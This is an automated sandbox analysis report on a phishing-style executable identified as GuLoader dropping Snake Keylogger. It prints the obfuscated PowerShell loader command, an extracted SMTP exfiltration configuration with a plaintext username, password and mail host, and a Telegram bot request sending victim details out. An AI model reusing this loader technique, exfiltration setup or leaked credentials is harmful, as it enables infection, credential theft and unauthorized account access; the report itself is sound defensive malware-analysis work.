Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
URGENTE Ref.exe

Overview

General Information

Sample name:URGENTE Ref.exe
Analysis ID:1633323
MD5:723743eb9cb98f3e735f7a3503b32ae7
SHA1:1415be8f7022b11fa0954a2cacec1f9c6433f76d
SHA256:c2c0e9cc144248554a3b91e723cd1770dbaa2d6acdd00e9021f5587f080c9286
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • URGENTE Ref.exe (PID: 3976 cmdline: "C:\Users\user\Desktop\URGENTE Ref.exe" MD5: 723743EB9CB98F3E735F7A3503B32AE7)
    • powershell.exe (PID: 996 cmdline: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Undismembered.exe (PID: 7924 cmdline: "C:\Users\user\AppData\Local\Temp\Undismembered.exe" MD5: 723743EB9CB98F3E735F7A3503B32AE7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "pedidos@bsp.com.es", "Password": "81xINaSf", "Host": "mail.bsp.com.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000002.00000002.1618451140.000000000B086000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: Undismembered.exe PID: 7924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Undismembered.exe PID: 7924JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Suspicious Outbound SMTP Connections
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 82.98.167.108, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Undismembered.exe, Initiated: true, ProcessId: 7924, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 63196
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", CommandLine: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\URGENTE Ref.exe", ParentImage: C:\Users\user\Desktop\URGENTE Ref.exe, ParentProcessId: 3976, ParentProcessName: URGENTE Ref.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Unsexual24=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Theopneustic\Portentousness.Unm177';$Authorize=$Unsexual24.SubString(53440,3);.$Authorize($Unsexual24)", ProcessId: 996, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-10T08:38:05.897529+010020600481Malware Command and Control Activity Detected192.168.2.66319682.98.167.108587TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-10T08:39:13.606813+010028033053Unknown Traffic192.168.2.649702104.21.32.1443TCP
          2025-03-10T08:39:16.627388+010028033053Unknown Traffic192.168.2.649704104.21.32.1443TCP
          2025-03-10T08:39:19.653023+010028033053Unknown Traffic192.168.2.649706104.21.32.1443TCP
          2025-03-10T08:39:22.752130+010028033053Unknown Traffic192.168.2.649708104.21.32.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-10T08:39:08.177900+010028032742Potentially Bad Traffic192.168.2.649700132.226.8.16980TCP
          2025-03-10T08:39:11.084381+010028032742Potentially Bad Traffic192.168.2.649700132.226.8.16980TCP
          2025-03-10T08:39:14.474735+010028032742Potentially Bad Traffic192.168.2.649703132.226.8.16980TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-10T08:38:59.903168+010028032702Potentially Bad Traffic192.168.2.649696142.250.185.142443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-03-10T08:39:38.178663+010018100071Potentially Bad Traffic192.168.2.663195149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000A.00000002.2495516741.0000000020581000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "pedidos@bsp.com.es", "Password": "81xINaSf", "Host": "mail.bsp.com.es", "Port": "587", "Version": "4.4"}
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeReversingLabs: Detection: 31%
          Multi AV Scanner detection for submitted file
          Source: URGENTE Ref.exeVirustotal: Detection: 33%Perma Link
          Source: URGENTE Ref.exeReversingLabs: Detection: 31%
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E87A8 CryptUnprotectData,10_2_226E87A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_226E8EF1 CryptUnprotectData,10_2_226E8EF1
          Source: URGENTE Ref.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49701 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.6:49696 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:63195 version: TLS 1.2
          Source: URGENTE Ref.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
          Source: C:\Users\user\Desktop\URGENTE Ref.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00406167 FindFirstFileA,FindClose,10_2_00406167
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,10_2_00405705
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 10_2_00402688 FindFirstFileA,10_2_00402688
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
          Source: C:\Users\user\Desktop\URGENTE Ref.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 0015F45Dh10_2_0015F2C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 0015F45Dh10_2_0015F4AC
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 0015FC19h10_2_0015F974
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C3308h10_2_226C2EF0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C2D41h10_2_226C2A90
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CFBD9h10_2_226CF930
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CD919h10_2_226CD670
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C3308h10_2_226C3236
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CD4C1h10_2_226CD218
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C3308h10_2_226C2EEA
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CDD71h10_2_226CDAC8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CE621h10_2_226CE378
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CE1C9h10_2_226CDF20
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C0D0Dh10_2_226C0B30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226C16F8h10_2_226C0B30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CEA79h10_2_226CE7D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h10_2_226C0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CEED1h10_2_226CEC28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CF781h10_2_226CF4D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CF329h10_2_226CF080
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226CD069h10_2_226CCDC0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EC82Fh10_2_226EC560
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E7EB5h10_2_226E7B78
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EE81Fh10_2_226EE550
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E9280h10_2_226E8FB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E3709h10_2_226E3460
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E4D21h10_2_226E4A78
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E7119h10_2_226E6E70
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EF13Fh10_2_226EEE70
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E02E9h10_2_226E0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EBF0Fh10_2_226EBC40
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E1CF9h10_2_226E1A50
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E9F1Fh10_2_226E9C50
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E48C9h10_2_226E4620
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E62D9h10_2_226E6030
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EDEFFh10_2_226EDC30
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E32B1h10_2_226E3008
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EACCFh10_2_226EAA00
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E6CC1h10_2_226E6A18
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EA3AFh10_2_226EA0E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E0B99h10_2_226E08F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E7571h10_2_226E72C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EE38Fh10_2_226EE0C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EC39Fh10_2_226EC0D0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E5179h10_2_226E4ED0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E2151h10_2_226E1EA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E6733h10_2_226E6488
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226ED14Fh10_2_226ECE80
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E0741h10_2_226E0498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EB15Fh10_2_226EAE90
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EA83Fh10_2_226EA570
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E0FF1h10_2_226E0D48
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E2A01h10_2_226E2758
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E55D1h10_2_226E5328
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E79C9h10_2_226E7720
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EB5EFh10_2_226EB320
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E25A9h10_2_226E2300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EF5CFh10_2_226EF300
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226ED5DFh10_2_226ED310
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EECAFh10_2_226EE9E0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E18A1h10_2_226E15F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226ECCBFh10_2_226EC9F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E9A8Fh10_2_226E97C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E5E81h10_2_226E5BD8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EDA6Fh10_2_226ED7A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E1449h10_2_226E11A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EBA7Fh10_2_226EB7B0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E2E59h10_2_226E2BB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226E5A29h10_2_226E5780
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 226EFA5Fh10_2_226EF790
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E84E90h10_2_22E84B98
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E847E8h10_2_22E84478
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E842B7h10_2_22E83FE8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8CAE0h10_2_22E8C7E8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E89FD8h10_2_22E89CE0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E822C7h10_2_22E81FF8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E887F0h10_2_22E884F8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E85CE8h10_2_22E859F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8F5E8h10_2_22E8F2F0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E83997h10_2_22E836C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8B7C0h10_2_22E8B4C8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E88CB8h10_2_22E889C0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E819A7h10_2_22E816D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E874D0h10_2_22E871D8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8E2C8h10_2_22E8DFD0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E83078h10_2_22E82DA8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8A4A0h10_2_22E8A1A8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E87998h10_2_22E876A0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E81087h10_2_22E80DB8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E861B0h10_2_22E85EB8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8FAB0h10_2_22E8F7B8
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8CFA8h10_2_22E8CCB0
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E82757h10_2_22E82488
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E89180h10_2_22E88E88
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E86678h10_2_22E86380
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E80767h10_2_22E80498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8E790h10_2_22E8E498
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8BC88h10_2_22E8B990
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E81E37h10_2_22E81B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E87E60h10_2_22E87B68
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E85358h10_2_22E85060
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8EC59h10_2_22E8E960
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8D470h10_2_22E8D178
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8A968h10_2_22E8A670
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E81517h10_2_22E81248
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E86B40h10_2_22E86848
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E802E7h10_2_22E80040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8D938h10_2_22E8D640
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E83E27h10_2_22E83B58
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8C150h10_2_22E8BE58
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E89648h10_2_22E89350
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E80BF7h10_2_22E80928
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E85820h10_2_22E85528
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8F120h10_2_22E8EE28
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8C618h10_2_22E8C320
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E83507h10_2_22E83238
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8AE30h10_2_22E8AB38
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E88328h10_2_22E88030
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8DE00h10_2_22E8DB08
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E8B2F8h10_2_22E8B000
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E82BE7h10_2_22E82918
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E89B10h10_2_22E89818
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 22E87008h10_2_22E86D10
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_235DF1CA
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_235DF1BD
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_235DF1BF
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_235DF228
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 235E0800h10_2_235E0508
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then jmp 235E0338h10_2_235E0040
          Source: C:\Users\user\AppData\Local\Temp\Undismembered.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]10_2_23612A80

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.6:63196 -> 82.98.167.108:587
          Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:63195 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.6:63196 -> 82.98.167.108:587
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:579569%0D%0ADate%20and%20Time:%2011/03/2025%20/%2007:39:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20579569%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
